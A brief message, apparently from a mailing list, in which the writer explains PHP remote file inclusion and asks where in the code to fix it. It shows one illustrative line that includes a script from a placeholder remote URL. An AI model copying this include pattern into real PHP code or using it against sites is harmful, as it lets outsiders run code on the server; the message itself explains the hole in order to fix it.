PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.

// my code...
// my code...
include ('http://..../externalhackscript.txt');
//my code...
//my code..

I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT.

Got it?

Regards,
Igor Escobar
Systems Analyst & Interface Designer